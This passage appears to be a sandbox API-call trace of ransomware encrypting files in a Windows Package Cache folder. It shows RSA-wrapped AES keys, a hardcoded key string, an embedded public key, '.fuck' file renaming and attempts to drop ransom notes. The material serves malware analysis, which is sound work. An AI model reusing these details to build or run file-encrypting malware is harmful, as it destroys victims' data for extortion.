Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi", dwFileAttributes=0x80) returned 0 [0240.755] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.755] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.756] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg", dwFileAttributes=0x2) returned 0 [0240.757] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f1288) returned 1 [0240.759] CryptCreateHash (in: hProv=0x28f1288, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.759] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.759] CryptHashData (hHash=0x28e74f8, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.759] CryptDeriveKey (in: hProv=0x28f1288, Algid=0x6610, hBaseData=0x28e74f8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e75b8) returned 1 [0240.759] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.759] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.759] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f1310) returned 1 [0240.760] CryptImportPublicKeyInfo (in: hCryptProv=0x28f1310, dwCertEncodingType=0x1, pInfo=0x29061e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2906218*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2906220*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e74b8) returned 1 [0240.760] CryptEncrypt (in: hKey=0x28e74b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.760] CryptEncrypt (in: hKey=0x28e74b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f10f0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f10f0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.760] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f10f0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.760] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.760] CryptEncrypt (in: hKey=0x28e75b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.760] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.761] CloseHandle (hObject=0xffffffff) returned 1 [0240.761] CloseHandle (hObject=0xffffffff) returned 1 [0240.761] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), bFailIfExists=0) returned 0 [0240.761] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi", dwFileAttributes=0x0) returned 0 [0240.762] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.gsg")) returned 0 [0240.762] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.fuck" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.fuck")) returned 0 [0240.762] CryptDestroyHash (hHash=0x28e74f8) returned 1 [0240.763] CryptDestroyKey (hKey=0x28e75b8) returned 1 [0240.763] CryptReleaseContext (hProv=0x28f1288, dwFlags=0x0) returned 1 [0240.763] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.763] FindClose (in: hFindFile=0x28e8638 | out: hFindFile=0x28e8638) returned 1 [0240.763] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\readme_back_files.htm")) returned 0xffffffff [0240.763] AreFileApisANSI () returned 1 [0240.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28db6c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 139 [0240.763] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.764] GetLastError () returned 0x5 [0240.764] GetLastError () returned 0x5 [0240.764] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.764] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.764] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\readme_back_files.htm")) returned 0xffffffff [0240.764] AreFileApisANSI () returned 1 [0240.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f6348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 116 [0240.764] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.765] GetLastError () returned 0x5 [0240.765] GetLastError () returned 0x5 [0240.765] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.765] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.765] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\readme_back_files.htm")) returned 0xffffffff [0240.765] AreFileApisANSI () returned 1 [0240.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0240.765] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.766] GetLastError () returned 0x5 [0240.766] GetLastError () returned 0x5 [0240.766] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.766] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0240.766] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.766] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.766] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e8578 [0240.766] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.766] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.767] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e8638 [0240.767] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.767] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.767] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.767] GetLastError () returned 0x5 [0240.767] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab")) returned 0x20 [0240.767] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0240.768] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.768] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.769] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0240.769] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f18e8) returned 1 [0240.771] CryptCreateHash (in: hProv=0x28f18e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.772] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.772] CryptHashData (hHash=0x28e7238, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.772] CryptDeriveKey (in: hProv=0x28f18e8, Algid=0x6610, hBaseData=0x28e7238, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e79f8) returned 1 [0240.772] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----d", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.772] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.772] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f15b8) returned 1 [0240.773] CryptImportPublicKeyInfo (in: hCryptProv=0x28f15b8, dwCertEncodingType=0x1, pInfo=0x29055b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29055e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29055f0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e74f8) returned 1 [0240.773] CryptEncrypt (in: hKey=0x28e74f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.773] CryptEncrypt (in: hKey=0x28e74f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f1288*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f1288*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.773] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f1288, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.773] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.773] CryptEncrypt (in: hKey=0x28e79f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.773] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.773] CloseHandle (hObject=0xffffffff) returned 1 [0240.773] CloseHandle (hObject=0xffffffff) returned 1 [0240.774] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), bFailIfExists=0) returned 0 [0240.774] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", dwFileAttributes=0x0) returned 0 [0240.774] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.gsg")) returned 0 [0240.775] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.fuck" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.fuck")) returned 0 [0240.775] CryptDestroyHash (hHash=0x28e7238) returned 1 [0240.775] CryptDestroyKey (hKey=0x28e79f8) returned 1 [0240.775] CryptReleaseContext (hProv=0x28f18e8, dwFlags=0x0) returned 1 [0240.776] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.776] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.776] GetLastError () returned 0x5 [0240.776] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi")) returned 0x20 [0240.776] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", dwFileAttributes=0x80) returned 0 [0240.776] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.777] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.777] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg", dwFileAttributes=0x2) returned 0 [0240.778] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f16c8) returned 1 [0240.780] CryptCreateHash (in: hProv=0x28f16c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.780] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.780] CryptHashData (hHash=0x28e7738, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.780] CryptDeriveKey (in: hProv=0x28f16c8, Algid=0x6610, hBaseData=0x28e7738, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e7878) returned 1 [0240.780] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----d", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.780] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.781] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f17d8) returned 1 [0240.781] CryptImportPublicKeyInfo (in: hCryptProv=0x28f17d8, dwCertEncodingType=0x1, pInfo=0x29051a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29051d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29051e0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e7638) returned 1 [0240.781] CryptEncrypt (in: hKey=0x28e7638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.781] CryptEncrypt (in: hKey=0x28e7638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f1b08*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f1b08*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.781] 